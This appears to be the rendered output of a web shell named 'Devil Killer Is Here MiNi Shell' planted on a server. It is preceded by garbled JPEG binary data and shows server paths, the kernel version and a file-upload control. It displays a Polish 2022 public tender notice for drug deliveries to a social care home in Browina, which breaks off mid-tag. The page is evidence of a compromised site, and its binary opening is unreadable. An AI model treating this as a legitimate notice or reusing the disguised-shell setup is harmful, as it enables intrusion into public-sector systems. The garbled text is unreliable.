JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220621/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220621/0021610701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawy leków dla Domu Pomocy Społecznej w Browinie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Dom Pomocy Społecznej w Browinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000294102</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Browina 57</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Browina</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-140</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">566757111</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">566757111</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">browina@powiattorunski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.powiattorunski.pl/6937,dom-pomocy-spolecznej-w-browinie</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Centrum Usług Wspólnych Powiatu Toruńskiego</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">365566575</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Browina 59</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Chełmża</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">87-140</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">566459888</span></h3> <h3 class="mb-0">1.11.10.) Numer faksu: <span class="normal">566459888</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">sekretariat@cuw.powiattorunski.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">https://www.bip.powiattorunski.pl/8247,centrum-uslug-wspolnych-powiatu-torunskiego-w-browinie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawy leków dla Domu Pomocy Społecznej w Browinie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f37e6a9b-f13d-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00216107</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00149026/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa leków dla Domu Pomocy Społecznej w Browinie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://powiattorunski.logintrade.net/login.html?return_to=/zapytania,wszystkie,propozycje.html?rodzaj=ustawowe <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://powiattorunski.logintrade.net/login.html?return_to=/zapytania,wszystkie,propozycje.html?rodzaj=ustawowe</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1a)<br/>Dopuszczalne przeglądarki internetowe:- Internet Explorer 8, Internet<br/>Explorer 9, Internet Explorer 10, Internet Explorer 11,- Google Chrome 31- Mozilla Firefox 26- Opera<br/>182)<br/>1b) Pozostałe wymagania techniczne:- dostęp do sieci Internet;- obsługa przez przeglądarkę<br/>protokołu XMLHttpRequest – ajax;- włączona obsługa JavaScript;- zalecana szybkość łącza<br/>internetowego powyżej 500 KB/s;- zainstalowany Acrobat Reader;- zainstalowane środowisko<br/>uruchomieniowe Java-Java SE Runtime Environment 6Update 24 lub nowszy.<br/>2) Osobą uprawnioną do porozumiewania się z Wykonawcami jest: Marcin Łowicki,<br/>e-mail: zamowienia@cuw.powiattorunski.pl<br/>3)W korespondencji kierowanej do Zamawiającego Wykonawcy powinni posługiwać się numerem<br/>przedmiotowego postępowania tj. CUW.272.17.2022</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.10.) Przyczyny odstąpienia od komunikacji elektronicznej: </h3> <p class="mb-0">wyspecjalizowany charakter zamówienia, użycie środków komunikacji elektronicznej wymaga narzędzi, urządzeń lub formatów plików, które nie są ogólnie dostępne lub nie są obsługiwane za pomocą ogólnie dostępnych aplikacji (art. 65 ust. 1 pkt 1 ustawy)</p> <h3 class="mb-0">3.11.) Sposób nieelektronicznego składania ofert, wniosków, oświadczeń oraz innych dokumentów: <span class="normal">nie dotyczy</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/W – ogólne rozporządzenie o ochronie danych, informujemy, iż:<br/>Administratorem, czyli podmiotem decydującym o tym jak będą wykorzystane Twoje dane osobowe jest<br/>Dyrektor Domu Pomocy Społecznej z siedzibą w Browinie 57 , 87-140 Chełmża ,(dalej „My”, „Zamawiający”). Możesz się z nim kontaktować w następujący<br/>sposób: listownie na adres podany wyżej, e-mailowo<br/>browina@powiattorunski.pl ; telefonicznie 56 675 71 11<br/>Inspektor danych osobowych: iod.browina@home.pl<br/>Przetwarzamy Twoje dane osobowe, ponieważ jest to niezbędne do zawarcia i wykonania umowy w<br/>sprawie zamówienia publicznego zawartej z Tobą, w tym do kontaktowania się z Tobą w celu realizacji<br/>umowy, jak również w celu archiwizacyjnym.<br/>Wymagamy podania przez Ciebie następujących danych<br/>osobowych, aby móc zawrzeć i wykonać umowę zawartą z Tobą:<br/>− nazwę (firmę) – imię i nazwisko w przypadku wykonawcy będącego osobą fizyczną,<br/>− adres wykonawcy,<br/>− adres email,<br/>− imię i nazwisko osoby wyznaczonej przez Ciebie do kontaktu.<br/>Jeśli z jakiegoś powodu nie podasz tych danych osobowych, niestety nie będziemy mogli zawrzeć z<br/>Tobą umowy. Jeśli wymagają tego przepisy prawa, możemy wymagać od Ciebie podania innych<br/>niezbędnych danych np. względów rachunkowych lub podatkowych. Poza tymi przypadkami podanie<br/>Twoich danych jest dobrowolne.<br/>Gwarantujemy Tobie prawo dostępu do Twoich danych i ich sprostowania, wynikające z ogólnego<br/>rozporządzenia o ochronie danych.<br/>Z uprawnień tych możesz skorzystać w odniesieniu do żądania sprostowania danych - zauważysz że<br/>Twoje dane są nieprawidłowe lub niekompletne, lub zostaniesz wezwany przez Zamawiającego do ich<br/>sprostowania. Masz prawo wnieść skargę w związku z przetwarzaniem przez Zamawiającego Twoich<br/>danych osobowych do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych Osobowych<br/>(adres: Prezes UODO ul. Stawki 2, 00-193 Warszawa).<br/>Twoje dane osobowe udostępniamy dostawcom: systemu<br/>elektronicznego obiegu dokumentów, poczty elektronicznej, usług IT oraz podmiotom wspierającym<br/>nas w świadczeniu usług drogą elektroniczną, czyli takim, które zapewniając usługi płatnicze. Możemy<br/>przekazać Twoje dane osobowe organom publicznym, każdemu kto skorzysta z prawa dostępu do<br/>informacji publicznej, a także na wystąpienie o udostępnienie protokołu wraz z załącznikami zgodnie z<br/>ustawą Prawo zamówień publicznych.<br/>Przechowujemy Twoje dane osobowe przez czas<br/>obowiązywania umowy zawartej z Tobą, a także po jej zakończeniu w celach:<br/>− dochodzenia roszczeń w związku z wykonywaniem umowy,<br/>− wykonywania obowiązków wynikających z przepisów prawa, w tym w szczególności<br/>podatkowych i rachunkowych,<br/>− archiwizacyjnych – maksymalnie przez okres 10 lat od dnia zakończenia wykonania umowy.<br/>Twoje dane osobowe nie będą przekazywane poza Europejski Obszar Gospodarczy.<br/>Twoje dane osobowe nie będą przetwarzane w sposób zautomatyzowany.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CUW.272.17.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 701357,49 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> •	Przedmiotem zamówienia są dostawy leków na potrzeby mieszkańców Domu Pomocy Społecznej w Browinie (dalej zwany DPS). Dostawy odbywać się będą raz dziennie 7 dni w tygodniu, a w sytuacjach tego wymagających nawet dwa razy dziennie, w ciągu dwóch godzin od chwili złożenia zamówienia, własnym transportem, na koszt Dostawcy. Podane ilości przedmiotu zamówienia (Załącznik nr 1 – Przedmiot Zamówienia - Asortyment) <br/>są wielkościami szacunkowymi, w związku z czym Zamawiający zastrzega sobie możliwość zmiany ilości i asortymentu w zakresie objętym ofertą Wykonawcy, a Wykonawca zobowiązuje się do elastycznego reagowania <br/>na zwiększenie lub zmniejszenie zamówienia składanego przez Zamawiającego. Z tego tytułu Wykonawcy nie przysługuje roszczenie odszkodowawcze.<br/>•	Wykonawca winien spełniać wymagania dotyczące oferowanego przedmiotu: Zamawiający określił wymagania odnośnie przedmiotu w Przedmiocie Zamówienia - Asortyment, stanowiącym Załączniku nr 1 do SIWZ. Pozostałe warunki realizacji zamówienia zostały określone we Wzorze Umowy, stanowiącym załącznik nr 4 do SIWZ. Ponadto wymaga się, aby zaoferowany asortyment:<br/>	<br/>	Posiadał aktualne dokumenty dopuszczające do obrotu i używania na terytorium Rzeczpospolitej Polskiej, zgodnie z obowiązującym prawem;<br/>	<br/>	Posiadał ważną charakterystykę produktu leczniczego;<br/>	<br/>	Miał nie mniej niż 75% okresu przydatności określonego przez producenta, o ile dotyczy.<br/><br/>•	Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1<br/>•	Termin (okres) wykonywania zamówienia: od dnia zawarcia umowy do 30.06.2025 r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33600000-6 - Produkty farmaceutyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.2	Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/><br/>Wykonawca posiada zezwolenie:<br/><br/>a)	Głównego Inspektora Farmaceutycznego na wytwarzanie produktów leczniczych (jeśli Wykonawca jest wytwórcą) lub<br/>b)	posiada zezwolenie na prowadzenie hurtowni farmaceutycznej w zakresie obrotu hurtowego produktami leczniczymi przeznaczonymi dla ludzi, o których mowa w ustawie Prawo farmaceutyczne lub<br/>c)	na prowadzenie apteki ogólnodostępnej w zakresie sprzedaży leków gotowych i przygotowywania leków recepturowych oraz <br/>d)	zezwolenie na prowadzenie obrotu hurtowego lub detalicznego środkami odurzającymi i substancjami psychotropowymi zgodnie z ustawą Prawo farmaceutyczne w zw. z ustawą o przeciwdziałaniu narkomanii lub inne równoważne dokumenty wydane przez właściwe organy państw członkowskich Unii Europejskiej.<br/><br/><br/>1.4 Warunki dotyczące zdolności technicznej lub zawodowej: <br/>a)	[KADRY] – Zamawiający musi posiadać zasoby pozwalające na dostarczenie leków w trybie pilnym w ciągu 2 godzin od zawiadomienia (stan zagrożenia życia lub zdrowia) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) (jeżeli dotyczy) zobowiązanie, o którym mowa w pkt VIII. 2. 4 SWZ . -<br/>&#34;Zamawiający oceni, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności<br/>techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez<br/>Wykonawcę spełniania warunków udziału w postępowaniu, a także zbada, czy nie zachodzą wobec<br/>tego podmiotu podstawy wykluczenia, które zostały przewidziane względem Wykonawcy&#34;.<br/>b) (jeżeli dotyczy) oświadczenie, o którym mowa w pkt XVIII. 2.4 - &#34;W przypadku, o którym mowa w pkt<br/>VIII. 5 SWZ , Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy (wzór wg załącznika<br/>nr 5 SWZ)&#34;.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> a) odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru, w celu potwierdzenia braku podstaw<br/>wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzony nie wcześniej niż 3 miesiące przed jego złożeniem<br/><br/><br/>b) Zamawiający uzna warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów za spełniony jeżeli Wykonawca wykaże, że posiada zezwolenie:<br/><br/>a)	Głównego Inspektora Farmaceutycznego na wytwarzanie produktów leczniczych (jeśli Wykonawca jest wytwórcą) lub<br/>b)	posiada zezwolenie na prowadzenie hurtowni farmaceutycznej w zakresie obrotu hurtowego produktami leczniczymi przeznaczonymi dla ludzi, o których mowa w ustawie Prawo farmaceutyczne lub<br/>c)	na prowadzenie apteki ogólnodostępnej w zakresie sprzedaży leków gotowych i przygotowywania leków recepturowych oraz <br/>d)	zezwolenie na prowadzenie obrotu hurtowego lub detalicznego środkami odurzającymi i substancjami psychotropowymi zgodnie z ustawą Prawo farmaceutyczne w zw. z ustawą o przeciwdziałaniu narkomanii lub inne równoważne dokumenty wydane przez właściwe organy państw członkowskich Unii Europejskiej. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> a) odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru, w celu potwierdzenia braku podstaw<br/>wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzony nie wcześniej niż 3 miesiące przed jego złożeniem<br/><br/><br/>b) Zamawiający uzna warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów za spełniony jeżeli Wykonawca wykaże, że posiada zezwolenie:<br/><br/>a)	Głównego Inspektora Farmaceutycznego na wytwarzanie produktów leczniczych (jeśli Wykonawca jest wytwórcą) lub<br/>b)	posiada zezwolenie na prowadzenie hurtowni farmaceutycznej w zakresie obrotu hurtowego produktami leczniczymi przeznaczonymi dla ludzi, o których mowa w ustawie Prawo farmaceutyczne lub<br/>c)	na prowadzenie apteki ogólnodostępnej w zakresie sprzedaży leków gotowych i przygotowywania leków recepturowych oraz <br/>d)	zezwolenie na prowadzenie obrotu hurtowego lub detalicznego środkami odurzającymi i substancjami psychotropowymi zgodnie z ustawą Prawo farmaceutyczne w zw. z ustawą o przeciwdziałaniu narkomanii lub inne równoważne dokumenty wydane przez właściwe organy państw członkowskich Unii Europejskiej. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> •	Zamawiający może zwrócić się o przedłożenie środków dowodowych, potwierdzających posiadanie zasobów umożliwiających realizację dostawy do 2h w trybie pilnym, pod rygorem wykluczenia z przetargu oraz odrzucenia oferty w związku z wprowadzeniem w błąd co do okoliczności faktycznych, mający istotny wpływ na decyzje podejmowane w postępowaniu o udzielenie zamówienia <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Dokument wymieniony w XI pkt 2.1 lit. a SWZ (odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i<br/>Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru, w celu potwierdzenia braku podstaw<br/>wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzony nie wcześniej niż 3<br/>miesiące przed jego złożeniem)<br/>każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, składa w swoim<br/>imieniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span 